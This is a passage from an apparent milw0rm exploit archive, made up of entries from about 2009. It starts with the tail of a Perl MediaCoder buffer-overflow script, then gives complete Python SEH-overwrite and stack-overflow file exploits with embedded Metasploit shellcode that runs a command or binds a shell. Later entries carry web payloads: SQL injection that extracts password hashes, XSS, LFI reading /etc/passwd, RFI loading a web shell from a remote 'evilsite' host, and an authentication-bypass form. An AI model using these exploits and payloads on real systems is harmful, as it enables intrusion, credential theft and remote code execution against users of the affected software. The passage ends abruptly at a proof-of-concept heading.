"\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c".
"\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e".
"\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35".
"\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30".
"\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a";
$id = $ARGV[0];
if ($id==1){
print "$header.$junk.$ret.$nop.$calc_shell.$nop";
exit;
}
if ($id==2){
print "$header.$junk.$ret.$nop.$adduser_shell.$nop";
exit;
}
if ($id==3){
print "$header.$junk.$ret.$nop.$bind_shell.$nop";
exit;
}
if ($id==4){
print "$header.$junk.$ret.$nop.$bind_vncinject.$nop";
exit;
}
print "\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print " +++ +++\n";
print " +++ +++\n";
print " +++ MediaCoder 0.6.2.4275 Universal Stack-Based Overflow +++\n";
print " +++ Written By Stack +++\n";
print " +++ +++\n";
print " +++ Usage Ex.: perl $0 1 >>Exploit.m3u +++\n";
print " +++ +++\n";
print " +++ Options: +++\n";
print " +++ 1 - win32_exec calc.exe +++\n";
print " +++ 2 - win32_adduser Pass=toor User=root +++\n";
print " +++ 3 - win32_bind Port 5555 +++\n";
print " +++ 4 - win32_bind_vncinject Port 5900 +++\n";
print " +++ +++\n";
print " +++ +++\n";
print " +++ +++\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
exit;
#EOF

# milw0rm

RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit

#!/usr/bin/python
# RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit
# Exploited By : zAx
# Discovered and Idea By : Encrypt3d.M!nd
# Tested On : Windows XP ServicePack 2 English.
# Thanks to : All My Friends.
print " RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit"
print " Written By : zAx"
print " Contact : ThE-zAx@Hotmail.Com"
header = "[Project]\nAssembler=masm\nGroup=1\nGroupExpand=1\n[Files]\n1="
zAx = "c4ca4238a0b923820dcc509a6f75849bc81e728d9d4c2f636f067f89cc14862ceccbc87e4b5ce2fe28308fd9f2a7baf3a87ff679a2f3e71d9181a67b7542122ce4da3b7fbbce2345d7772b0674a318d51679091c5a880faf6fb5e6087eb1b2dc8f14e45fceea167a5a36dedd4bea2543c9"
eip = "\x5D\x38\x82\x7C" # KERNEL32.DLL ESP In Windows SP2 EN
nopsled = "\x90"*20
#win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x54\x4e\x43\x4b\x48\x4e\x57"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x38"
"\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x48"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x32\x46\x50\x45\x57\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
"\x41\x30\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x53"
"\x42\x4c\x46\x56\x4b\x48\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x58\x42\x44\x4e\x30\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x45\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x46\x4a\x59"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
"\x4e\x46\x43\x46\x50\x42\x45\x46\x4a\x47\x45\x36\x42\x30\x5a"
)
stack = header + zAx + eip + nopsled + shellcode + nopsled
file=open("zAx.rap","w")
file.write(stack)
file.close()
raw_input("\nExploit file created!, Now Go to RadASM and Open Our Devil Project :D\n")

# milw0rm

EO Video v1.36 PlayList SEH Overwrite Exploit

#!/usr/bin/python
#usage: exploit.py
print "**************************************************************************"
print "[*] EO Video v1.36 PlayList Seh Overwrite Exploit\n"
print "[*] Author: j0rgan"
print "[*] Seh Exploitation : His0k4"
print "[*] Tested on: Windows XP SP2 (Fr)\n"
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"
print "**************************************************************************"

buff = "\x41" * 1356

next_seh = "\xEB\x06\x41\x41"

seh = "\x14\x1E\x5B\x58" #pop pop ret msgsm32 .acm

header1= (
"\x3C\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E\x0A\x3C\x50\x6C\x61\x79\x6C"
"\x69\x73\x74\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73\x74\x3E\x0A\x3C"
"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F"
"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65"
"\x6E\x63\x79\x3E\x31\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63"
"\x79\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x46\x6F\x6C\x64\x65"
"\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F\x3C\x2F\x4E\x61\x6D"
"\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x31"
"\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x0A\x3C\x2F"
"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73"
"\x74\x3E\x0A\x3C\x50\x72\x6F\x6A\x65\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E"
"\x0A\x3C\x4E\x61\x6D\x65\x3E")

header2= (
"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E"
"\x30\x3C\x2F\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E\x0A\x3C\x45\x6E\x64\x54"
"\x69\x6D\x65\x3E\x30\x3C\x2F\x45\x6E\x64\x54\x69\x6D\x65\x3E\x0A\x3C\x4D\x65"
"\x64\x69\x61\x53\x69\x7A\x65\x3E\x0A\x3C\x57\x69\x64\x74\x68\x3E\x2D\x31\x3C"
"\x2F\x57\x69\x64\x74\x68\x3E\x0A\x3C\x48\x65\x69\x67\x68\x74\x3E\x2D\x31\x3C"
"\x2F\x48\x65\x69\x67\x68\x74\x3E\x0A\x3C\x2F\x4D\x65\x64\x69\x61\x53\x69\x7A"
"\x65\x3E\x0A\x3C\x53\x74\x61\x74\x65\x3E\x33\x30\x32\x31\x36\x3C\x2F\x53\x74"
"\x61\x74\x65\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73\x69\x74\x69\x6F"
"\x6E\x49\x6E\x64\x65\x78\x3E\x30\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73"
"\x69\x74\x69\x6F\x6E\x49\x6E\x64\x65\x78\x3E\x0A\x3C\x2F\x50\x72\x6F\x6A\x65"
"\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E\x0A\x3C\x2F\x50\x6C\x61\x79\x6C\x69"
"\x73\x74\x3E\x5C\x6E\x3C\x2F\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E")


# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x35"
"\x9c\xf7\xbc\x83\xeb\xfc\xe2\xf4\xc9\x74\xb3\xbc\x35\x9c\x7c\xf9"
"\x09\x17\x8b\xb9\x4d\x9d\x18\x37\x7a\x84\x7c\xe3\x15\x9d\x1c\xf5"
"\xbe\xa8\x7c\xbd\xdb\xad\x37\x25\x99\x18\x37\xc8\x32\x5d\x3d\xb1"
"\x34\x5e\x1c\x48\x0e\xc8\xd3\xb8\x40\x79\x7c\xe3\x11\x9d\x1c\xda"
"\xbe\x90\xbc\x37\x6a\x80\xf6\x57\xbe\x80\x7c\xbd\xde\x15\xab\x98"
"\x31\x5f\xc6\x7c\x51\x17\xb7\x8c\xb0\x5c\x8f\xb0\xbe\xdc\xfb\x37"
"\x45\x80\x5a\x37\x5d\x94\x1c\xb5\xbe\x1c\x47\xbc\x35\x9c\x7c\xd4"
"\x09\xc3\xc6\x4a\x55\xca\x7e\x44\xb6\x5c\x8c\xec\x5d\x6c\x7d\xb8"
"\x6a\xf4\x6f\x42\xbf\x92\xa0\x43\xd2\xff\x96\xd0\x56\x9c\xf7\xbc"
)

exploit = header1 + buff + next_seh + seh + shellcode + header2

try:
out_file = open("exploit.eop",'w')
out_file.write(exploit)
out_file.close()
print "Exploit File Created!\nNow Open it :)"
except:
print "Error"

# milw0rm

mks_vir 9b < 1.2.0.0b297 (mksmonen.sys) Privilege Escalation Exploit

MKS Sp. z o. o. - http://www.mks.com.pl/

Affected Software:
mks_vir 9 BETA < 1.2.0.0 - build 297

Affected Driver:
mksmonen.sys

Local Privilege Escalation Exploit
For Educational Purposes Only !

NT Internals - http://www.ntinternals.org/
alex ntinternals org

References:
mks_vir (mksmonen.sys) Privilege Escalation Vulnerability
NTIADV0809 - http://www.ntinternals.org/ntiadv0809/ntiadv0809.html

Exploiting Common Flaws in Drivers
Ruben Santamarta - http://www.reversemode.com/

Exploit:
http://ntinternals.org/ntiadv0809/MksMonEn_Exp.zip
http://milw0rm.com/sploits/2009-MksMonEn_Exp.zip


Advisory:
http://ntinternals.org/ntiadv0809/ntiadv0809.html

# milw0rm

Realtek Sound Manager 1.15.0.0 PlayList SEH Overwrite Exploit

#!/usr/bin/python

print "[*] Realtek Sound Manager 1.15.0.0 (PlayList) Seh Overwrite Exploit\n"
print "[*] Author: shinnai"
print "[*] Seh Exploitation : His0k4"
print "[*] Tested on: Windows XP SP2 (Fr)\n"
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"

buff = "\x41" * 200

next_seh = "\xEB\x06\x90\x90"

seh = "\xBE\x2E\xC6\x72" #pop pop ret msacm32.drv

buff2 = "\x44"*1989

shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
)

exploit = buff + next_seh + seh + shellcode + buff2

try:
out_file = open("exploit.pla",'w')
out_file.write(exploit)
out_file.close()
print "Exploit File Created!\nNow import it from Realtek"
except:
print "Error"

# milw0rm

Blogsa <= 1.0 Beta 3 XSS Vulnerability

Software: Blogsa <= 1.0 Beta 3 XSS Vulnerability Software Site: blogsa.net Discovered by: Onur YILMAZ aka DJR Blog: http://www.onuryilmaz.info E-mail: contactonuryilmazinfo

XSS

http://localhost/Widgets.aspx?w=Search&p=do&searchText= script alert(document.cookie) /script

Screen

http://img14.imageshack.us/img14/7803/12371681.jpg

Belkin BullDog Plus UPS-Service Buffer Overflow Exploit

Belkin BullDog Plus UPS-Service Buffer Overflow Exploit

Tested on Windows XP SP3
JMP ESP from user32.dll, 0x7E429353
Shellcode is bind 4444 from Metasploit

nc host port < belkin-buldog-exploit

Thats all folks!

http://milw0rm.com/sploits/2009-belkin-bulldog-exploit.zip

# milw0rm

CMS S.Builder <= 3.7 Remote File Inclusion Vulnerability

CMS S.Builder <= 3.7 RFI Vulnerability

Information:

Vendor: http://www.sbuilder.ru
Affected versions: 3.7 and possibly later versions


Description:

The engine of this cms makes site files (index.php, etc) with code like:
PHP Code:

if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = '';
...
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
...

If register_globals=On, attacker can write remote url (if allow_url_fopen=On) or local path into variable binn_include_path.


PoC:

HTTP Request:

GET /index.php HTTP/1.1
Host: www.site.com
Cookie: binn_include_path=http://evil.site.com/shell.txt?

# by cr0w
# http://cr0w-at.blogspot.com

# milw0rm

nForum 1.5 Multiple Remote SQL Injection Vulnerabilities

Application: nForum
Version: 1.5
Website: http://sourceforge.net/projects/nforum/

Bugs: [A] Multiple SQL Injection

Exploitation: Remote

Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com

Menu

1) Bugs
2) Code
3) Fix

Bugs

- [A] Multiple SQL Injection

Requisites: magic_quotes_gpc = off
File affected: showtheme.php, userinfo.php

These bugs allows a guest to view username and
the password of a registered user.

[+] Code

- [A] Multiple SQL Injection

http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23

http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23

Fix

No fix.

# milw0rm

Nokia Multimedia Player 1.0 (playlist) Universal SEH Overwrite Exploit

#usage: exploit.py
print "**************************************************************************"
print " Nokia Multimedia Player 1.0 (playlist) Universal Seh Overwrite Exploit\n"
print " Founder : 0in"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"



buff = "\x41" * 1880

next_seh = "\xEB\x06\x41\x41"

nops = "\x90"*19

seh = "\x0E\xD2\x8E\x01" #yes universal :D




# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x67"
"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x77\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6b\x59\x79\x6c\x6b"
"\x58\x37\x34\x53\x30\x35\x50\x53\x30\x6c\x4b\x41\x55\x47\x4c\x6c"
"\x4b\x51\x6c\x63\x35\x54\x38\x77\x71\x7a\x4f\x6e\x6b\x70\x4f\x74"
"\x58\x4e\x6b\x43\x6f\x37\x50\x43\x31\x5a\x4b\x47\x39\x4e\x6b\x37"
"\x44\x6c\x4b\x45\x51\x58\x6e\x37\x41\x6b\x70\x6c\x59\x6c\x6c\x4f"
"\x74\x6f\x30\x62\x54\x47\x77\x6b\x71\x59\x5a\x76\x6d\x74\x41\x6b"
"\x72\x58\x6b\x69\x64\x65\x6b\x41\x44\x47\x54\x34\x44\x44\x35\x38"
"\x65\x6e\x6b\x33\x6f\x31\x34\x37\x71\x6a\x4b\x51\x76\x6e\x6b\x44"
"\x4c\x42\x6b\x6e\x6b\x43\x6f\x57\x6c\x55\x51\x6a\x4b\x4c\x4b\x47"
"\x6c\x4e\x6b\x75\x51\x4a\x4b\x4e\x69\x31\x4c\x66\x44\x37\x74\x4f"
"\x33\x55\x61\x4f\x30\x30\x64\x6e\x6b\x77\x30\x36\x50\x4e\x65\x39"
"\x50\x31\x68\x64\x4c\x6c\x4b\x73\x70\x36\x6c\x6e\x6b\x30\x70\x37"
"\x6c\x6c\x6d\x4e\x6b\x45\x38\x45\x58\x58\x6b\x73\x39\x6e\x6b\x4b"
"\x30\x4e\x50\x75\x50\x73\x30\x63\x30\x6c\x4b\x45\x38\x65\x6c\x31"
"\x4f\x30\x31\x4c\x36\x75\x30\x32\x76\x6d\x59\x59\x68\x6c\x43\x4b"
"\x70\x41\x6b\x46\x30\x45\x38\x48\x70\x4e\x6a\x65\x54\x43\x6f\x71"
"\x78\x4f\x68\x59\x6e\x4c\x4a\x76\x6e\x52\x77\x6b\x4f\x6b\x57\x72"
"\x43\x53\x51\x30\x6c\x52\x43\x77\x70\x67"
)


exploit = buff + next_seh + seh + nops + shellcode

try:
out_file = open("nokia.npl",'w')
out_file.write(exploit)
out_file.close()
print "Exploit file created!\n"
except:
print "Error"

# milw0rm

UMI.CMS Cross-Site Scripting vulnerability

Affected Software

UMI.CMS
Versions 2.x prior to 2.7.1 (build 10856)

Product Link:
http://www.umi-cms.ru


Severity Rating

Severity: Medium
Impact: Cross-Site Scripting
Attack Vector: Remote

CVSS v2:
Base Score: 4.3
Temporal Score: 3.4
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N/E:P/RL:O/RC:C)

CVE: not assigned

Software Description

UMI.CMS is a content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).

Vulnerability Description

Positive Technologies Research Team has discovered a Cross-Site Scripting (XSS) vulnerability in UMI.CMS.

User input passed to the "fields_filter" setting is not properly sanitized. This can be exploited to inject malicious code and allows to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example:
http://[server]/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&fields_filter[price][1]=1

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool users in order to gather data from their machines. An attacker can steal the session cookie and take over the account impersonating the user. It is also possible to modify page content presented to the user.

Solution

Update to version 2.7.1 (build 10856).

Disclosure Timeline

04/03/2009 - Vendor is notified
04/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
06/03/2009 - Vendor releases fixed version and details
06/03/2009 - Public disclosure


Credits

This vulnerability was discovered by Dmitriy Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.

References

http://en.securitylab.ru/lab/PT-2009-12
http://www.ptsecurity.ru/advisory.asp

Complete list of vulnerability reports published by Positive Technologies Research Team:

http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp

TinX CMS 3.x SQL Injection Vulnerability

TinX CMS SQL Injection vulnerability

Affected Software

TinX CMS
Versions 3.x prior to 3.5.1

Product Link:
http://sourceforge.net/project/showfiles.php?group_id=133415


Severity Rating

Severity: High
Impact: SQL Injection
Attack Vector: Remote

CVSS v2:
Base Score: 7.5
Temporal Score: 5.9
Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P/E:P/RL:O/RC:C)

CVE: CVE-2009-0825


Software Description

TinX CMS is a content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).


Vulnerability Description

Positive Technologies Research Team has discovered a SQL Injection vulnerability in TinX CMS.

User input passed to the "id" parameter is not properly sanitized. This can allows remote attackers to execute arbitrary SQL commands via the "id" parameter.

Example:
http://[server]/system/rss.php?id=1'SQL-code

SQL injection is an attack technique that can be used to extract, modify, add or delete information from database servers that are used by vulnerable web applications. SQL injection vulnerabilities are caused by an unsecured programming technique that allows client-supplied data to interfere with the syntax of SQL queries. SQL is a programming language that is used by applications to communicate with database systems.


Solution

Update to version 3.5.1.


Disclosure Timeline

04/03/2009 - Vendor is notified
04/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
05/03/2009 - Vendor releases fixed version and details
06/03/2009 - Public disclosure


Credits

This vulnerability was discovered by Dmitriy Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.


References

http://en.securitylab.ru/lab/PT-2009-13
http://www.ptsecurity.ru/advisory.asp

Complete list of vulnerability reports published by Positive Technologies Research Team:

http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp

nForum 1.5 Multiple SQL Injection

Application: nForum
Version: 1.5
Website: http://sourceforge.net/projects/nforum/

Bugs: [A] Multiple SQL Injection

Exploitation: Remote
Date: 06 Mar 2009

Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com

Menu

1) Bugs
2) Code
3) Fix

Bugs

- [A] Multiple SQL Injection

Requisites: magic_quotes_gpc = off
File affected: showtheme.php, userinfo.php

These bugs allows a guest to view username and
the password of a registered user.

Code

- [A] Multiple SQL Injection

http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT
1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23

http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT
1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23

Fix
No fix.

OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability

OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability

Script: "OneOrZero Helpdesk and Task Management System is a powerful enterprise helpdesk system
used by companies and groups large and small to manage information and requests in their organization. "
Script site: http://www.oneorzero.com/
Download: http://www.oneorzero.com/index.php?controller=main_general&option=main_downloads

[LFI] Vuln: http://site.com/oozv1657/common/login.php?default_language=../../../../../../../../../../etc/passwd

Bug: ./oozv1657/common/login.php (line: 104)

require_once "../common/common.php";
if (eregi("supporter", $_SERVER[PHP_SELF]) || eregi("admin", $_SERVER[PHP_SELF]))
require_once "../lang/$default_language.lang.php";
else
require_once "lang/$default_language.lang.php"; // LFI (register_globals = On, magic_quotes_gpc = Off)

Greetz: D3m0n_DE * str0ke * and otherz..

[ dun / 2009 ]

# milw0rm

isiAJAX v1 (praises.php id) Remote SQL Injection Vulnerability

Script site: http://isiajax.sourceforge.net/
Download: http://sourceforge.net/project/showfiles.php?group_id=169754

[SQL] Vuln: http://site.com/isiAJAX/ejemplo/paises.php?id=-1+UNION+SELECT+1,USER()--
http://isiajax.sourceforge.net/demos/practicos/busqueda/paises.php?id=-1+UNION+SELECT+1,CONCAT_WS(char(58),id,nombre,apellidos,id_pais,edad,telefono,email)+from+usuarios--

Bug: ./isiAJAX/ejemplo/paises.php (linez: 10-14)

$paise = mysql_query("SELECT id, nombre FROM pais WHERE id_continente=$_GET[id]", $conexion); //
while ($paises = mysql_fetch_row($paise)) { // SQL inj.
?> "> //
}
Greetz: D3m0n_DE * str0ke * and otherz..

[ dun / 2009 ]

# milw0rm

Wili-CMS 0.4.0 (RFI/LFI/AB) Multiple Remote Vulnerabilities

Application: Wili-CMS
Version: 0.4.0
Website: http://wili-cms.sourceforge.net/

Bugs: [A] Multiple Remote/Local File Inclusion
[B] Authentication Bypass

Exploitation: Remote

Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com

Menu

1) Bugs
2) Code
3) Fix

Bugs

- [A] Multiple Remote/Local File Inclusion

Requisites: none
File affected: index.php

This bug allows a guest to include remote and
local files and however to exec remote commands.

...

if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
include( $globals['content_dir'].$globals['template_dir']."error404.php" );
}

...

include( template_file( $globals['root_template'] ) );


- [B] Authentication Bypass

Requisites: magic_quotes_gpc = off
File affected: lib/admin/init_session.php

This bug allows a guest to login as admin.

...

$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password']
: $_SESSION['password'];
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ?
$_REQUEST['uname'] : $_SESSION['uname'];

...

$sth = mysql_query(
"SELECT id
FROM ".$globals['userstable']."
WHERE username='".$_SESSION['uname']."'
AND adminflag=1
AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );

// password ok -> login
if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
$globals['user'] = mysql_result( $userh = mysql_query( "SELECT id,
skipwelcome FROM ".$globals['userstable']." WHERE
username='".$globals['username']."'", $globals['dbh'] ),0,0);

if ( $globals['admin_modus'] == "loggedin" ) {
// log login
db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );
// goto welcome page if skipwelcome flag of this user is not set
if ( !(mysql_result( $userh, 0, 1 )) ) {
$_REQUEST['npage'] = get_firstpage( "adminwelcome" );
}
$globals['admin_modus'] = "";
}

...

Code


- [A] Multiple Remote/Local File Inclusion

shell.txt: ?php system($_GET['cmd']); ?

http://www.site.com/path/?npage=-1&content_dir=http://www.evilsite.com/shell.txt&cmd=ls
http://www.site.com/path/?npage=1&content_dir=http://www.evilsite.com/shell.txt&cmd=ls

http://www.site.com/path/?npage=-1&content_dir=../../../../etc/passwd
http://www.site.com/path/?npage=1&content_dir=../../../../etc/passwd


- [B] Authentication Bypass

html
head
title Wili-CMS 0.4.0 Authentication Bypass Exploit /title
/head
body
form action="http://www.site.com/path/admin.php" method="POST"
input type="text" name="uname" value="admin"
input type="hidden" name="password" value="1') UNION ALL SELECT 1#"
input type="hidden" name="mode" value="loggedin"
input type="hidden" name="npage" value="1"
input type="submit" value="Exploit"
/form
/body
/html

Fix

No fix.

# milw0rm

Blue Eye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability

BlueEye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability
found by ka0x

Download: http://kent.dl.sourceforge.net/sourceforge/blueeyecms/blue_eye_cms-1_0_0_preRC.rar
need magic_quotes_gpc = Off

- Vuln code:

10: if (!empty($_COOKIE["BlueEyeCMS_login"])) { // --> Only??
11: $c_login = $_COOKIE["BlueEyeCMS_login"]; // --> Not clean??
12: $c_pass = $_COOKIE["BlueEyeCMS_pass"];
13: $c_key = $_COOKIE["BlueEyeCMS_key"];
....
16: $table = $db_prefix."users";
17: $query = mysql_query("SELECT id FROM `$table` WHERE `user` = '$c_login' AND `password` = '$c_pass' AND `key` = '$c_key'"); // -> VULN
18: $rows = mysql_num_rows($query); -> num rows of the query
19: $result = mysql_fetch_array($query);
....
21: if ($rows == 1) { // -> check if exists one row..
22: $logged = $c_login;
23: $logged_id = $result['id'];
24: }
....
204: img src="http://www.blogger.com/%5C" / Logged as: ".$logged." (ID: ".$logged_id.")

Proof Of Concept:
